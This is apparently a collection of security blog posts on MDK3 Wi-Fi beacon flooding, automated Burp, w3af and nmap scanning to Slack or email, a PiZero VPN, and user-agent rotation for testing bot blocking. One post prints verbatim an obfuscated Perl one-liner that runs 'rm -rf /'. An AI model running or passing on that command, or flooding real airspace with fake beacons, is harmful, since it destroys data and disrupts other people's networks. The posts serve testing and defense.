I have been reading a lot about Beacon Frames on my vacation this week (stop laughing) and I came across a tool in Kali called MDK3 that will allow you to send fake beacon frames. I couldnt pass up a chance to test this so I pulled out my trusty TL-WN722N and made a list of the 5,0000 most common SSIDS from wiggle.net.
Here are the commands to run it assuming your wireless interface is WLAN0:
Grab the commonssids.txt from my gist:
wget https://gist.githubusercontent.com/jgamblin/da795e571fb5f91f9e86a27f2c2f626f/raw/0e5e53b97e372a21cb20513d5064fde11aed844c/commonssids.txt
Start airmon-ng:
airmon-ng start wlan0
Start MDK3 with the string:
mdk3 wlan0mon b -f commonssids.txt -g -t -m -s 1000
Here are the command flags:
b - Beacon Flood Mode
f - Read SSIDs from file
g - Show station as 54 Mbit
t - Show station using WPA TKIP encryption
m - Use valid accesspoint MAC from OUI database
Here is what the output looks like:
Here is what the wireless list looks like on a host:
As always be careful using this anywhere that it could cause issues with other people’s internet access. No one likes a jerk.
Blog Posts
Thanks to PoisonTap I have finally had a reason to pull my PiZero out of the ever growing “Stuff to Hack” pile and start working on it. I have a couple of neat ideas that are coming down the pipeline but this weekend I built a VPN sidecar using a USB OTG Gadget. I wanted to be able to use the PiZero to offload some slow processes (big nmap scans) and as a place to verify findings through an always on VPN connection (I like and use Private Internet Access).
Configuration is fairly simple and only takes about 30 minutes:
Install your pizero as an ethernet gadget.
Share Your Internet Connection With Your PI:
You can now login into your PiZero at:
[email protected]
Update Your Pi and install OpenVPN:
sudo apt-get update && sudo apt-get -y dist-upgrade
sudo apt-get -y install openvpn
wget https://www.privateinternetaccess.com/openvpn/openvpn.zip
unzip openvpn.zip -d openvpn
sudo cp openvpn/ca.rsa.2048.crt openvpn/crl.rsa.2048.pem /etc/openvpn/
sudo cp "openvpn/US Texas.ovpn" "/etc/openvpn/Texas.conf"
#You can use a diffrent VPN endpoint if you like. Note the extension change from ovpn to conf.
sudo reboot
Create /etc/openvpn/login
containing only your username and password, one per line, for example:
username
password123
Change the permissions on this file so only the root user can read it:
sudo chmod 600 /etc/openvpn/login
Setup OpenVPN to use your stored username and password by editing the the config file for the VPN endpoint:
sudo nano /etc/openvpn/Texas.conf
Change the following lines so they go from this:
auth-user-pass > auth-user-pass /etc/openvpn/login
crl-verify crl.rsa.2048.pem > crl-verify /etc/openvpn/crl.rsa.2048.pem
ca ca.rsa.2048.crt > ca /etc/openvpn/ca.rsa.2048.crt
Test VPN:
sudo openvpn --config /etc/openvpn/Texas.conf
If the VPN is working you will see:
Next step is to enable VPN at boot:
sudo systemctl enable openvpn@Texas
sudo reboot
After reboot verify VPN connection:
You now have an always on PiZero USB VPN SideCar! Have fun. 🙂
In the last two years Burp Suite Proxy has become my go to web application security scanner. As with everything recently if I can automate it, I do. So this weekend I built a simple script to scan a website with Burp, create a PDF report and post it to Slack:
Here is how I set it up:
- Create a SlackBot and copy API Key.
- Install and Configure Burp & Carbonator (I ended up having to install RDP to do this 🤷)
- Install wkhtml2pdf
- Copy this shell script to autoburp.sh and update as needed (add your token):
https://gist.github.com/jgamblin/90c7aa1b369d1aa1e77b0af03216b9e1
- Copy this line to your crontab to run this scan at 0100 on Mondays:
00 01 * * 1 ./autoburp.sh
- Enjoy weekly automated burp scanning and slack reporting of your website.
I have recently been automating a lot of my technical security tasks and building slack bots around them and it was w3af‘s turn. W3af is an amazing open source web application security scanner that my friend Andres Riancho writes and maintains.
The goal of this project was to build scheduled and automated scans of my web properties with pdf reporting and slack alerting:
Configuration is fairly easy.
- Create a SlackBot and copy API Key.
- Update and install needed software on server:
sudo apt-get update && sudo apt-get dist-upgrade
sudo apt-get w3af
- Install wkhtml2pdf in headless mode.
- Create necessary folders:
sudo mkdir /w3af
- Copy this shell script and up token:
https://gist.github.com/jgamblin/ae1bdb24113788e70b91d0cc826a163f
- Copy this w3af config file:
https://gist.github.com/jgamblin/2133162778e1d438f57114946b6244d6
- Copy this line to your crontab to run this scan every night at midnight:
00 00 * * * ./w3af/w3af.sh
- Enjoy automated w3af scans with slack alerting.
As I have talked about before “You can’t defend what you dont know exists” so today while sitting around and trying to recover from walking pneumonia I wrote slackmap to continually nmap a network and post the differences to slack:
Configuration is amazingly easy. I run a copy of this on a $5 a month Digitalocean Droplet for an external view and a Raspberry Pi for internal scanning.
- Create a SlackBot and copy API Key.
- Update and install needed software on server:
sudo apt-get update && sudo apt-get dist-upgrade
sudo apt-get install ssmtp nmap xsltproc
- Create necessary folders:
sudo mkdir /nmap/
sudo mkdir /nmap/diffs
- Copy this to /nmap/slackmap.sh and add SlackBot API key to Line 8:
https://gist.github.com/jgamblin/7d64a284e5291a444e12c16daebc81e0
- Copy this line to your crontab to run this scan every 15 minutes (make longer for bigger networks):
*/15 * * * * /nmap/slackmap.sh
- Enjoy a new level of network visibility. : )
I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always always “Know what is on your network.” While that is simple advice it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans) for $40,000 a year.
After I cried for the state of my industry I told them I could do this for them with a small shell script, a $5 a month Digital Ocean Droplet and a free Sendgrid account.
Here is how I did it:
- Created a free Sendgrid account.
- Spun up $5 a Month Digitalocean Ubuntu Droplet.
- Added a nmaper.company.com DNS record to be perfectly clear waht the box was doing.
- Updated and installed needed software:
sudo apt-get update && sudo apt-get dist-upgrade
sudo apt-get install ssmtp nmap xsltproc
- Created necessary folders:
mkdir /root/nmap/
mkdir /root/nmap/diffs
- Edit /etc/ssmtp/ssmtp.conf with this:
[email protected]
mailhub=smtp.sendgrid.com
rewriteDomain=
[email protected]
UseSTARTTLS=YES
AuthUser=jgamblin
AuthPass=password
FromLineOverride=YES
- Copy this to
/root/namp/scan.sh
:
#!/bin/sh
TARGETS="jerrygamblin.com scanme.nmap.org"
OPTIONS="-v -sV -T4 -F --open"
date=$(date +%F%T)
cd ~/nmap/diffs
nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null
email()
{
/usr/sbin/ssmtp [email protected] <<EOF
From: [email protected]
Subject: nmap ndiff
$(date +"%Y-%m-%d")
*** NDIFF RESULTS ***
$(cat diff-$date)
EOF
}
if [ -e scan-prev.xml ]; then
ndiff scan-prev.xml scan-$date.xml > diff-$date
[ "$?" -eq "1" ] && email
fi
ln -sf scan-$date.xml scan-prev.xml
Test (add
cat diff-$date
to bottom of the script to see output.)- Add a cron job to crontab to run every 15 minutes (or hour for bigger networks)
- Talk your boss into buying you something awesome with the $39,970 in savings.
It was as simple as that and I put this together in an afternoon. Up next is to build a Slackbot and an to deliver the differences to their slack channel.
I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet :
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
su - burp
echo mate-session> ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart
From there you can use any RDP viewer to connect to your droplet:
Earlier this week someone sent me this one line perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Due to some really clever code obfuscation it runs rm -rf /
.
You can deobfuscate (is that word?) with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
While trying to figure out how this code code I stumbled upon the fact that OSX does not require --no-preserve-root
which has been required since version 6.4 of GNU Core Utilities which was released in 2006.
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
on Ubuntu 16:10:
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
on MacOS 10.12:
This seems like a pretty big oversight by the Apple Team and I have filled a bug report but haven’t heard anything yet.
Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500 valid user agents from this file.
First I went with the old standby of CURL which does the job but I was only able to do 10 requests in 4 seconds.
Here is what the output of curl.sh looks like:
That was not going to be fast enough for my testing needs so I switch to Apache Bench and am able to do 1,000 requests in 2 seconds. Which was what I need to do proper testing.
Here is what the output of ab.sh looks like:
All the scripts are in this GitHub Repo.
As always: Use these for good, not bad.
I use nmap all the time at work and recently came across rainmap-lite which is an amazing web interface for nmap that allows you to easily schedule and email scan results. I wanted to be able to share it with a class I am teaching so I did what I have been doing lately and put it into a docker container:
Running it is as simple as:
docker run -ti -p 8080:8080 --name rainmap jgamblin/rainmap
Then access:
http://yourip:8080/console
You can now run a ton of nmap scans and get the results emailed to you and your team:
Here is the DockerFile:
FROM ubuntu:latest
RUN apt-get update && apt-get install sqlite3 git nmap python-pip -y
RUN pip install --upgrade pip
RUN pip install lxml
RUN pip install Django
RUN git clone https://github.com/cldrn/rainmap-lite
WORKDIR /rainmap-lite/rainmap-lite/
ADD run.sh /rainmap-lite/rainmap-lite/run.sh
RUN chmod 777 /rainmap-lite/rainmap-lite/run.sh
CMD ./run.sh
Here is the run.sh:
#!/bin/bash
sed -i "s/8000/8080/g" "nmaper-cronjob.py"
echo What is your public IP address?
read ip
sed -i "s/127.0.0.1/$ip/g" "nmaper-cronjob.py"
echo What is your SMTP user name?
read user
sed -i "s/[email protected]/$user/g" "nmaper-cronjob.py"
echo What is your SMTP password?
read pass
sed -i "s/yourpassword/$pass/g" "nmaper-cronjob.py"
echo What is your SMTP address?
read smtp
sed -i "s/smtp.gmail.com/$smtp/g" "nmaper-cronjob.py"
python manage.py migrate
python manage.py loaddata nmapprofiles
python manage.py createsuperuser
python manage.py runserver 0.0.0.0:8080 &
while true
do
python nmaper-cronjob.py
sleep 15
done
Protip: SendGrid offers a free SMTP server.